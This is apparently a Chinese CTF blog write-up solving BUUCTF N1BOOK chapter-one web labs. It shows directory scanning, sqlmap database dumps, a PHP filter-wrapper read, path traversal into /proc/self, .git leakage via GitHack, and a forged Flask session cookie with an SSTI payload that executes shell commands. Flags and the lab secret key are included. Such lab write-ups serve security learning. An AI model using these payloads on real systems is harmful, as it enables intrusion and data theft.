?? 博主介紹
????? 博主介紹:大家好,我是 hacker-routing ,很高興認(rèn)識大家~
?主攻領(lǐng)域:【滲透領(lǐng)域】【應(yīng)急響應(yīng)】 【python】 【VulnHub靶場復(fù)現(xiàn)】【面試分析】
??點贊?評論?收藏 == 養(yǎng)成習(xí)慣(一鍵三連)??
??歡迎關(guān)注??一起學(xué)習(xí)??一起討論??一起進(jìn)步??文末有彩蛋
??作者水平有限,歡迎各位大佬指點,相互學(xué)習(xí)進(jìn)步!
目錄
前言
[第一章 web入門]常見的搜集
robots.txt有flag1
index.php~有flag2
.index.php.swp有flag3
[第一章 web入門]SQL注入-1
sqlmap一把梭
[第一章 web入門]afr_1
php偽協(xié)議
[第一章 web入門]afr_2
目錄穿越,文件讀取
[第一章 web入門]粗心的小李
1.下載GitHack
2..git/泄漏
[第一章 web入門]afr_3
前言
N1BOOK是Nu1L Team為方便讀者打造的免費平臺,讀者可在上面享受書籍相關(guān)資源以及查閱勘誤。
[第一章 web入門]常見的搜集
n1book{info_1s_v3ry_imp0rtant_hack}
這里提示敏感文件,這里使用御劍掃描不到目錄
我這里使用dirsearch掃描網(wǎng)站目錄:
┌──(root??kali)-[~]
└─# dirsearch -u http://9fa5191e-fbba-4744-bff4-6f7a789577b3.node5.buuoj.cn:81/ -e*
-e* 參數(shù),通常來說,它應(yīng)該被替換為具體的文件擴(kuò)展名,以便進(jìn)行目標(biāo)網(wǎng)站的有針對性掃描
robots.txt有flag1
flag1:n1book{info_1
index.php~有flag2
flag2:s_v3ry_im
.index.php.swp有flag3
flag3:p0rtant_hack}
拼接起來,flag是:n1book{info_1s_v3ry_imp0rtant_hack}
[第一章 web入門]SQL注入-1
n1book{union_select_is_so_cool}
這里我給大家搞好了閉合點,這個很簡單,通過簡單的判斷就可以出來
sqlmap一把梭
感興趣的小伙伴們可以嘗試下利用手工聯(lián)合注入,我這里直接利用sqlmap跑
sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" --dbs --batch ##跑庫
sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note --tables --batch ##跑表
sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note -T fl4g --columns --batch ##跑列
sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note -T fl4g -C 'fllllag' --dump --batch ##跑字段
[第一章 web入門]afr_1
http://cba81709-c243-48c4-b593-837760ff0de5.node5.buuoj.cn:81/
n1book{afr_1_solved}
php偽協(xié)議
直接利用php偽協(xié)議讀取flag
?p=php://filter/convert.base64-encode/resource=flag
[第一章 web入門]afr_2
n1book{afr_2_solved}
http://e1003d70-123f-4635-8946-a3674a107066.node5.buuoj.cn:81/
右擊查看網(wǎng)頁源代碼,發(fā)現(xiàn)有個/img目錄
目錄穿越,文件讀取
[第一章 web入門]粗心的小李
n1book{git_looks_s0_easyfun}
1.下載GitHack
GitCode - 開發(fā)者的代碼家園https://gitcode.com/lijiejie/githack/overview?utm_source=csdn_github_accelerator&isLogin=1
2..git/泄漏
python GitHack.py http://b376ab2f-a56f-49fe-8887-b0275fba45a1.node5.buuoj.cn:81/.git/
會生成一個index.html文件,打開就可以拿到flag了
[第一章 web入門]afr_3
n1book{afr_3_solved}
提交一個123上去
然后查看文章,發(fā)現(xiàn)url有傳參
隨便輸入一個123,發(fā)現(xiàn)這里可能存在目錄穿越或者文件包含漏洞
發(fā)現(xiàn)一個server.py文件
http://f70723e8-84fa-4861-b580-63657fa57ec5.node5.buuoj.cn:81/article?name=../../../../../proc/self/cmdline
在 Linux 系統(tǒng)中,/proc/self/cmdline 是一個特殊的文件,它包含了當(dāng)前進(jìn)程的命令行參數(shù)。通過讀取這個文件,可以獲取當(dāng)前進(jìn)程的命令行參數(shù)。
http://f70723e8-84fa-4861-b580-63657fa57ec5.node5.buuoj.cn:81/article?name=../../../../../proc/self/cwd/server.py
這里發(fā)現(xiàn)flag.py和key.py
flag.py不允許訪問
#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'
在 Linux 中,/proc/self/cwd/ 是一個特殊的符號鏈接,它指向當(dāng)前進(jìn)程的當(dāng)前工作目錄。通過將 ../../../../../proc/self/cwd/key.py 附加到網(wǎng)站的地址中,你嘗試獲取當(dāng)前工作目錄下的 key.py 文件。
根據(jù)你提供的信息,得到的文件內(nèi)容是 #!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'。這個文件內(nèi)容表示是一個以 Python 編寫的腳本,定義了一個名為 key 的變量,并給它賦了 'Drmhze6EPcv0fN_81Bj-nA' 這個字符串值。
加密腳本的獲取方式:
?git clone https://github.com/noraj/flask-session-cookie-manager
┌──(root??kali)-[~/桌面/flask-session-cookie-manager]
└─# python3 flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zb9oCQ.Nn27TDkaahhdaRVZ6bm4ktrMcpI
當(dāng)我們使用腳本得到session時,我們需要抓包,進(jìn)行偽造cookie,得到flag文章來源:http://www.zghlxwxcb.cn/news/detail-829832.html
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zb9oCQ.Nn27TDkaahhdaRVZ6bm4ktrMcpI
文章來源地址http://www.zghlxwxcb.cn/news/detail-829832.html
到了這里,關(guān)于【BUUCTF N1BOOK】[第一章 web入門] 通關(guān)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!